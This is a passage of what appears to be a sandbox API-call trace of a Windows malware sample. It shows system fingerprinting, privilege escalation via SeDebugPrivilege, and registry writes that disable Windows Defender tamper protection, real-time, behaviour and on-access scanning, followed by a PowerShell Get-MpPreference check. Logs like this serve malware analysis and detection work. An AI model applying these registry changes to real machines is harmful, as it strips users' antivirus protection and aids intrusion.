riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c994 | out: ppvObject=0x26c994*=0x5222080) returned 0x0 [0066.112] WbemLocator:IUnknown:QueryInterface (in: This=0x5222080, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26c950 | out: ppvObject=0x26c950*=0x0) returned 0x80004002 [0066.112] WbemLocator:IUnknown:AddRef (This=0x5222080) returned 0x3 [0066.112] WbemLocator:IUnknown:QueryInterface (in: This=0x5222080, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26c2ac | out: ppvObject=0x26c2ac*=0x0) returned 0x80004002 [0066.112] WbemLocator:IUnknown:QueryInterface (in: This=0x5222080, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26c25c | out: ppvObject=0x26c25c*=0x0) returned 0x80004002 [0066.112] WbemLocator:IUnknown:QueryInterface (in: This=0x5222080, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c268 | out: ppvObject=0x26c268*=0x0) returned 0x80004002 [0066.112] CoGetContextToken (in: pToken=0x26c2c8 | out: pToken=0x26c2c8) returned 0x0 [0066.113] CoGetContextToken (in: pToken=0x26c6d0 | out: pToken=0x26c6d0) returned 0x0 [0066.113] WbemLocator:IUnknown:QueryInterface (in: This=0x5222080, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002 [0066.113] WbemLocator:IUnknown:Release (This=0x5222080) returned 0x2 [0066.113] WbemLocator:IUnknown:Release (This=0x5222080) returned 0x1 [0066.113] CoGetContextToken (in: pToken=0x26cd40 | out: pToken=0x26cd40) returned 0x0 [0066.113] CoGetContextToken (in: pToken=0x26cca0 | out: pToken=0x26cca0) returned 0x0 [0066.113] WbemLocator:IUnknown:QueryInterface (in: This=0x5222080, riid=0x26cd70*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26cd6c | out: ppvObject=0x26cd6c*=0x5222080) returned 0x0 [0066.113] WbemLocator:IUnknown:AddRef (This=0x5222080) returned 0x3 [0066.113] WbemLocator:IUnknown:Release (This=0x5222080) returned 0x2 [0066.113] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5227410, puCount=0x26cf04 | out: puCount=0x26cf04*=0x2) returned 0x0 [0066.113] WbemDefPath:IWbemPath:GetText (in: This=0x5227410, lFlags=8, puBuffLength=0x26cf00*=0x0, pszText=0x0 | out: puBuffLength=0x26cf00*=0xf, pszText=0x0) returned 0x0 [0066.113] WbemDefPath:IWbemPath:GetText (in: This=0x5227410, lFlags=8, puBuffLength=0x26cf00*=0xf, pszText="00000000000000" | out: puBuffLength=0x26cf00*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0066.113] CoCreateInstance (in: rclsid=0x75241284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x752412e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x26cddc | out: ppv=0x26cddc*=0x5228d78) returned 0x0 [0066.113] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5228d78, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x26ce70 | out: ppNamespace=0x26ce70*=0x5228e84) returned 0x0 [0066.125] WbemLocator:IUnknown:QueryInterface (in: This=0x5228e84, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cd0c | out: ppvObject=0x26cd0c*=0x7129bc) returned 0x0 [0066.125] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x7129bc, pProxy=0x5228e84, pAuthnSvc=0x26cd5c, pAuthzSvc=0x26cd58, pServerPrincName=0x26cd50, pAuthnLevel=0x26cd54, pImpLevel=0x26cd44, pAuthInfo=0x26cd48, pCapabilites=0x26cd4c | out: pAuthnSvc=0x26cd5c*=0xa, pAuthzSvc=0x26cd58*=0x0, pServerPrincName=0x26cd50, pAuthnLevel=0x26cd54*=0x6, pImpLevel=0x26cd44*=0x2, pAuthInfo=0x26cd48, pCapabilites=0x26cd4c*=0x1) returned 0x0 [0066.125] WbemLocator:IUnknown:Release (This=0x7129bc) returned 0x1 [0066.125] WbemLocator:IUnknown:QueryInterface (in: This=0x5228e84, riid=0x752410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cd00 | out: ppvObject=0x26cd00*=0x7129dc) returned 0x0 [0066.125] WbemLocator:IUnknown:QueryInterface (in: This=0x5228e84, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccfc | out: ppvObject=0x26ccfc*=0x7129bc) returned 0x0 [0066.125] WbemLocator:IClientSecurity:SetBlanket (This=0x7129bc, pProxy=0x5228e84, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0066.126] WbemLocator:IUnknown:Release (This=0x7129bc) returned 0x2 [0066.126] WbemLocator:IUnknown:Release (This=0x7129dc) returned 0x1 [0066.126] CoTaskMemFree (pv=0x700ab8) [0066.126] WbemLocator:IUnknown:Release (This=0x5228d78) returned 0x0 [0066.126] WbemLocator:IUnknown:QueryInterface (in: This=0x5228e84, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c8fc | out: ppvObject=0x26c8fc*=0x7129dc) returned 0x0 [0066.126] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26c8b8 | out: ppvObject=0x26c8b8*=0x0) returned 0x80004002 [0066.126] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26c6d4 | out: ppvObject=0x26c6d4*=0x0) returned 0x80004002 [0066.127] WbemLocator:IUnknown:AddRef (This=0x7129dc) returned 0x3 [0066.127] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26c214 | out: ppvObject=0x26c214*=0x0) returned 0x80004002 [0066.127] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26c1c4 | out: ppvObject=0x26c1c4*=0x0) returned 0x80004002 [0066.127] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c1d0 | out: ppvObject=0x26c1d0*=0x71293c) returned 0x0 [0066.127] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x71293c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26c1d8 | out: pCid=0x26c1d8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0066.127] WbemLocator:IUnknown:Release (This=0x71293c) returned 0x3 [0066.127] CoGetContextToken (in: pToken=0x26c230 | out: pToken=0x26c230) returned 0x0 [0066.128] CoGetContextToken (in: pToken=0x26c638 | out: pToken=0x26c638) returned 0x0 [0066.128] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6c8 | out: ppvObject=0x26c6c8*=0x7129c4) returned 0x0 [0066.128] WbemLocator:IRpcOptions:Query (in: This=0x7129c4, pPrx=0x7129dc, dwProperty=2, pdwValue=0x26c6f0 | out: pdwValue=0x26c6f0) returned 0x80004002 [0066.128] WbemLocator:IUnknown:Release (This=0x7129c4) returned 0x3 [0066.128] WbemLocator:IUnknown:Release (This=0x7129dc) returned 0x2 [0066.128] CoGetContextToken (in: pToken=0x26cc10 | out: pToken=0x26cc10) returned 0x0 [0066.128] CoGetContextToken (in: pToken=0x26cb70 | out: pToken=0x26cb70) returned 0x0 [0066.128] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x26cc40*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x26cc3c | out: ppvObject=0x26cc3c*=0x5228e84) returned 0x0 [0066.128] WbemLocator:IUnknown:AddRef (This=0x5228e84) returned 0x4 [0066.128] WbemLocator:IUnknown:Release (This=0x5228e84) returned 0x3 [0066.128] WbemLocator:IUnknown:Release (This=0x5228e84) returned 0x2 [0066.128] SysStringLen (param_1=0x0) returned 0x0 [0066.128] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5221fc8, puCount=0x26cfd4 | out: puCount=0x26cfd4*=0x0) returned 0x0 [0066.128] WbemDefPath:IWbemPath:GetText (in: This=0x5221fc8, lFlags=2, puBuffLength=0x26cfd0*=0x0, pszText=0x0 | out: puBuffLength=0x26cfd0*=0x20, pszText=0x0) returned 0x0 [0066.128] WbemDefPath:IWbemPath:GetText (in: This=0x5221fc8, lFlags=2, puBuffLength=0x26cfd0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x26cfd0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0066.128] CoGetContextToken (in: pToken=0x26cc40 | out: pToken=0x26cc40) returned 0x0 [0066.128] WbemLocator:IUnknown:AddRef (This=0x7129dc) returned 0x3 [0066.128] WbemLocator:IUnknown:QueryInterface (in: This=0x7129dc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cad4 | out: ppvObject=0x26cad4*=0x7129dc) returned 0x0 [0066.129] WbemLocator:IUnknown:Release (This=0x7129dc) returned 0x3 [0066.129] WbemLocator:IUnknown:Release (This=0x7129dc) returned 0x2 [0066.129] WbemDefPath:IWbemPath:GetText (in: This=0x5221fc8, lFlags=2, puBuffLength=0x26cfd8*=0x0, pszText=0x0 | out: puBuffLength=0x26cfd8*=0x20, pszText=0x0) returned 0x0 [0066.129] WbemDefPath:IWbemPath:GetText (in: This=0x5221fc8, lFlags=2, puBuffLength=0x26cfd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x26cfd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0066.129] IWbemServices:GetObject (in: This=0x5228e84, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x26cf8c*=0x0, ppCallResult=0x0 | out: ppObject=0x26cf8c*=0x5227570, ppCallResult=0x0) returned 0x0 [0066.169] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5227410, puCount=0x26cf8c | out: puCount=0x26cf8c*=0x2) returned 0x0 [0066.169] WbemDefPath:IWbemPath:GetText (in: This=0x5227410, lFlags=4, puBuffLength=0x26cf88*=0x0, pszText=0x0 | out: puBuffLength=0x26cf88*=0xf, pszText=0x0) returned 0x0 [0066.170] WbemDefPath:IWbemPath:GetText (in: This=0x5227410, lFlags=4, puBuffLength=0x26cf88*=0xf, pszText="00000000000000" | out: puBuffLength=0x26cf88*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0066.170] IWbemClassObject:Get (in: This=0x5227570, wszName="VolumeSerialNumber", lFlags=0, pVal=0x26cf88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x228203c*=0, plFlavor=0x2282040*=0 | out: pVal=0x26cf88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x228203c*=8, plFlavor=0x2282040*=0) returned 0x0 [0066.170] SysStringByteLen (bstr="9C354B42") returned 0x10 [0066.170] SysStringByteLen (bstr="9C354B42") returned 0x10 [0066.170] IWbemClassObject:Get (in: This=0x5227570, wszName="VolumeSerialNumber", lFlags=0, pVal=0x26cf90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x228203c*=8, plFlavor=0x2282040*=0 | out: pVal=0x26cf90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x228203c*=8, plFlavor=0x2282040*=0) returned 0x0 [0066.170] SysStringByteLen (bstr="9C354B42") returned 0x10 [0066.170] SysStringByteLen (bstr="9C354B42") returned 0x10 [0066.286] GetCurrentProcessId () returned 0x71c [0066.291] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x26e2e4 | out: lpLuid=0x26e2e4*(LowPart=0x14, HighPart=0)) returned 1 [0066.292] GetCurrentProcess () returned 0xffffffff [0066.293] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x26e2e0 | out: TokenHandle=0x26e2e0*=0x278) returned 1 [0066.293] AdjustTokenPrivileges (in: TokenHandle=0x278, DisableAllPrivileges=0, NewState=0x2282324*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0066.294] CloseHandle (hObject=0x278) returned 1 [0066.303] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x26e9c0 | out: SystemInformation=0x32358f0, ResultLength=0x26e9c0*=0xd850) returned 0x0 [0066.325] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x32358f0, Length=0x20000, ResultLength=0x26e9cc | out: SystemInformation=0x32358f0, ResultLength=0x26e9cc*=0xd850) returned 0x0 [0066.354] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\e660f428-738e-469e-93fc-20803ca8aa37") returned 0x278 [0066.356] CloseHandle (hObject=0x278) returned 1 [0066.438] GetCurrentProcess () returned 0xffffffff [0066.439] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e9a0 | out: TokenHandle=0x26e9a0*=0x28c) returned 1 [0066.442] GetTokenInformation (in: TokenHandle=0x28c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26e9a0 | out: TokenInformation=0x0, ReturnLength=0x26e9a0) returned 0 [0066.442] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x717560 [0066.442] GetTokenInformation (in: TokenHandle=0x28c, TokenInformationClass=0x8, TokenInformation=0x717560, TokenInformationLength=0x4, ReturnLength=0x26e9a0 | out: TokenInformation=0x717560, ReturnLength=0x26e9a0) returned 1 [0066.531] LocalFree (hMem=0x717560) returned 0x0 [0066.532] DuplicateTokenEx (in: hExistingToken=0x28c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26e9a8 | out: phNewToken=0x26e9a8*=0x29c) returned 1 [0066.532] CheckTokenMembership (in: TokenHandle=0x29c, SidToCheck=0x2280c1c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26e9b8 | out: IsMember=0x26e9b8) returned 1 [0066.532] CloseHandle (hObject=0x29c) returned 1 [0066.548] GetCurrentProcess () returned 0xffffffff [0066.548] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x26e990 | out: TokenHandle=0x26e990*=0x29c) returned 1 [0066.548] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x26e990 | out: TokenInformation=0x0, ReturnLength=0x26e990) returned 0 [0066.549] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x717570 [0066.549] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x8, TokenInformation=0x717570, TokenInformationLength=0x4, ReturnLength=0x26e990 | out: TokenInformation=0x717570, ReturnLength=0x26e990) returned 1 [0066.549] LocalFree (hMem=0x717570) returned 0x0 [0066.549] DuplicateTokenEx (in: hExistingToken=0x29c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x26e998 | out: phNewToken=0x26e998*=0x2a0) returned 1 [0066.549] CheckTokenMembership (in: TokenHandle=0x2a0, SidToCheck=0x25e810c*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x26e9a8 | out: IsMember=0x26e9a8) returned 1 [0066.549] CloseHandle (hObject=0x2a0) returned 1 [0066.855] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Defender\\Features", ulOptions=0x0, samDesired=0x2001f, phkResult=0x26e974 | out: phkResult=0x26e974*=0x0) returned 0x2 [0066.856] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Defender\\Features", ulOptions=0x0, samDesired=0x2001f, phkResult=0x26e938 | out: phkResult=0x26e938*=0x0) returned 0x2 [0066.856] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Defender\\Features", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x26e934, lpdwDisposition=0x26e9bc | out: phkResult=0x26e934*=0x29c, lpdwDisposition=0x26e9bc*=0x1) returned 0x0 [0066.860] RegQueryValueExW (in: hKey=0x29c, lpValueName="TamperProtection", lpReserved=0x0, lpType=0x26e990, lpData=0x0, lpcbData=0x26e98c*=0x0 | out: lpType=0x26e990*=0x0, lpData=0x0, lpcbData=0x26e98c*=0x0) returned 0x2 [0066.860] RegSetValueExW (in: hKey=0x29c, lpValueName="TamperProtection", Reserved=0x0, dwType=0x4, lpData=0x26e9ac*=0x0, cbData=0x4 | out: lpData=0x26e9ac*=0x0) returned 0x0 [0066.861] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x2001f, phkResult=0x26e974 | out: phkResult=0x26e974*=0x0) returned 0x2 [0066.861] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", ulOptions=0x0, samDesired=0x2001f, phkResult=0x26e938 | out: phkResult=0x26e938*=0x0) returned 0x2 [0066.861] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x26e934, lpdwDisposition=0x26e9bc | out: phkResult=0x26e934*=0x2a0, lpdwDisposition=0x26e9bc*=0x1) returned 0x0 [0066.862] RegQueryValueExW (in: hKey=0x2a0, lpValueName="DisableAntiSpyware", lpReserved=0x0, lpType=0x26e990, lpData=0x0, lpcbData=0x26e98c*=0x0 | out: lpType=0x26e990*=0x0, lpData=0x0, lpcbData=0x26e98c*=0x0) returned 0x2 [0066.862] RegSetValueExW (in: hKey=0x2a0, lpValueName="DisableAntiSpyware", Reserved=0x0, dwType=0x4, lpData=0x26e9ac*=0x1, cbData=0x4 | out: lpData=0x26e9ac*=0x1) returned 0x0 [0066.863] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2001f, phkResult=0x26e974 | out: phkResult=0x26e974*=0x0) returned 0x2 [0066.863] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2001f, phkResult=0x26e938 | out: phkResult=0x26e938*=0x0) returned 0x2 [0066.863] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2001f, lpSecurityAttributes=0x0, phkResult=0x26e934, lpdwDisposition=0x26e9bc | out: phkResult=0x26e934*=0x2a4, lpdwDisposition=0x26e9bc*=0x1) returned 0x0 [0066.863] RegQueryValueExW (in: hKey=0x2a4, lpValueName="DisableBehaviorMonitoring", lpReserved=0x0, lpType=0x26e990, lpData=0x0, lpcbData=0x26e98c*=0x0 | out: lpType=0x26e990*=0x0, lpData=0x0, lpcbData=0x26e98c*=0x0) returned 0x2 [0066.863] RegSetValueExW (in: hKey=0x2a4, lpValueName="DisableBehaviorMonitoring", Reserved=0x0, dwType=0x4, lpData=0x26e9ac*=0x1, cbData=0x4 | out: lpData=0x26e9ac*=0x1) returned 0x0 [0066.864] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2001f, phkResult=0x26e974 | out: phkResult=0x26e974*=0x2a8) returned 0x0 [0066.864] RegQueryValueExW (in: hKey=0x2a8, lpValueName="DisableOnAccessProtection", lpReserved=0x0, lpType=0x26e9a8, lpData=0x0, lpcbData=0x26e9a4*=0x0 | out: lpType=0x26e9a8*=0x0, lpData=0x0, lpcbData=0x26e9a4*=0x0) returned 0x2 [0066.864] RegQueryValueExW (in: hKey=0x2a8, lpValueName="DisableOnAccessProtection", lpReserved=0x0, lpType=0x26e990, lpData=0x0, lpcbData=0x26e98c*=0x0 | out: lpType=0x26e990*=0x0, lpData=0x0, lpcbData=0x26e98c*=0x0) returned 0x2 [0066.864] RegSetValueExW (in: hKey=0x2a8, lpValueName="DisableOnAccessProtection", Reserved=0x0, dwType=0x4, lpData=0x26e9ac*=0x1, cbData=0x4 | out: lpData=0x26e9ac*=0x1) returned 0x0 [0066.864] RegCloseKey (hKey=0x2a8) returned 0x0 [0066.864] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection", ulOptions=0x0, samDesired=0x2001f, phkResult=0x26e974 | out: phkResult=0x26e974*=0x2a8) returned 0x0 [0066.865] RegQueryValueExW (in: hKey=0x2a8, lpValueName="DisableScanOnRealtimeEnable", lpReserved=0x0, lpType=0x26e9a8, lpData=0x0, lpcbData=0x26e9a4*=0x0 | out: lpType=0x26e9a8*=0x0, lpData=0x0, lpcbData=0x26e9a4*=0x0) returned 0x2 [0066.865] RegQueryValueExW (in: hKey=0x2a8, lpValueName="DisableScanOnRealtimeEnable", lpReserved=0x0, lpType=0x26e990, lpData=0x0, lpcbData=0x26e98c*=0x0 | out: lpType=0x26e990*=0x0, lpData=0x0, lpcbData=0x26e98c*=0x0) returned 0x2 [0066.865] RegSetValueExW (in: hKey=0x2a8, lpValueName="DisableScanOnRealtimeEnable", Reserved=0x0, dwType=0x4, lpData=0x26e9ac*=0x1, cbData=0x4 | out: lpData=0x26e9ac*=0x1) returned 0x0 [0066.865] RegCloseKey (hKey=0x2a8) returned 0x0 [0067.090] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0067.090] CreatePipe (in: hReadPipe=0x26e8c8, hWritePipe=0x26e8c4, lpPipeAttributes=0x26e848, nSize=0x0 | out: hReadPipe=0x26e8c8*=0x2ac, hWritePipe=0x26e8c4*=0x2b0) returned 1 [0067.091] GetCurrentProcess () returned 0xffffffff [0067.091] GetCurrentProcess () returned 0xffffffff [0067.092] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x2ac, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26e8cc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26e8cc*=0x2b4) returned 1 [0067.092] CloseHandle (hObject=0x2ac) returned 1 [0067.092] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0067.093] CoTaskMemAlloc (cb=0x20e) returned 0x712620 [0067.093] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x712620 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp") returned 0x39 [0067.093] CoTaskMemFree (pv=0x712620) [0067.094] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"powershell\" Get-MpPreference -verbose", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp", lpStartupInfo=0x26e804*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x2b0, hStdError=0x0), lpProcessInformation=0x274e5f8 | out: lpCommandLine="\"powershell\" Get-MpPreference -verbose", lpProcessInformation=0x274e5f8*(hProcess=0x2b8, hThread=0x2ac, dwProcessId=0x688, dwThreadId=0x644)) returned 1 [0067.138] CloseHandle (hObject=0x2b0) returned 1 [0067.146] GetFileType (hFile=0x2b4) returned 0x3 [0067.148] CloseHandle (hObject=0x2ac) returned 1 [0067.150] ReadFile (in: hFile=0x2b4, lpBuffer=0x274f320, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x26e984, lpOverlapped=0x0 | out: lpBuffer=0x274f320*, lpNumberOfBytesRead=0x26e984*=0x4f, lpOverlapped=0x0) returned 1 [0079.472] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x71c) returned 0x2a4 [0079.478] 